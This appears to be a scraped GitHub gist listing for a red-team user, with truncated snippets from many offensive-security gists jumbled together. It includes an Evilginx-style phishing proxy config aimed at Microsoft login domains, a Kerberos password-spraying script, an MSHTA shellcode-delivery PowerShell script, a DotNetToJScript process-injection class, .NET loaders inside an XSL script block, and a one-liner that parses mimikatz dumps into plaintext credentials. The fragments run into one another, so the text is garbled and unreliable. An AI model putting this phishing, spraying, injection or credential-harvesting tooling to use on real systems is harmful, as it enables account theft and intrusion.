David kafkaesqu3
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
@kafkaesqu3
kafkaesqu3 / example.cs
Created October 29, 2018 03:44
Loads .NET Assembly into script host from current path
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
{
public class ComAbandonment
{
@kafkaesqu3
kafkaesqu3 / switch-local-git-repo-to-fork.md
Created November 14, 2018 02:50 — forked from jpierson/switch-local-git-repo-to-fork.md
How to move to a fork after cloning

If you are like me you find yourself cloning a repo, making some proposed changes and then deciding later to contribute back using the GitHub Flow convention. Below is a set of instructions I've developed for myself on how to deal with this scenario and an explanation of why it matters based on jagregory's gist.

To follow GitHub flow you should really have created a fork initially as a public representation of the forked repository and then cloned that instead. My understanding is that the typical setup would have your local repository pointing to your fork as origin and the original forked repository as upstream so that you can use these keywords in other git commands.

  1. Clone some repo (you've probably already done this step)

@kafkaesqu3
kafkaesqu3 / office.yaml
Created November 30, 2018 23:20 — forked from ztxq/office.yaml
author: '@ztx'
min_ver: '2.2.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false}
- {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'office365.com', session: false, is_landing: false}
- {phish_sub: 'secure.aadcdn', orig_sub: 'secure.aadcdn', domain: 'microsoftonline-p.com', session: true, is_landing: false}
- {phish_sub: 'browser.pipe.aria', orig_sub: 'browser.pipe.aria', domain: 'microsoft.com', session: true, is_landing: false}
- {phish_sub: 'r4.res', orig_sub: 'r4.res', domain: 'office365.com', session: true, is_landing: false}
@kafkaesqu3
kafkaesqu3 / macchanger-onboot.txt
Last active January 22, 2019 20:48
macchanger configuration
root@kali:~# apt-get install macchanger
root@kali:~# systemctl disable network-manager
root@kali:~# cat /etc/default/macchanger
# before bringing up any network interface, run macchanger. Careful, this is
# not guaranteed to prevent leaking your real MAC address before the new one
# gets assigned!
#
ENABLE_ON_POST_UP_DOWN=false
@kafkaesqu3
kafkaesqu3 / kinit_user_brute.sh
Created March 19, 2019 02:28 — forked from ropnop/kinit_user_brute.sh
A quick script to perform horizontal password spraying against a user list by requesting TGTs from the DC with kinit
#!/bin/bash
# Title: kinit_user_brute.sh
# Author: @ropnop
# Description: This is a PoC for doing horizontal password sprays using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
@kafkaesqu3
kafkaesqu3 / TestMSHTAShellcodeDelivery.ps1
Created April 12, 2019 12:26
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credits for CACTUSTORCH HERE
I was in escape sequence hell ;-)
' ( ) ( )
@kafkaesqu3
kafkaesqu3 / Inject.cs
Created July 12, 2019 16:56
DotNetToJScript Build Walkthrough
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):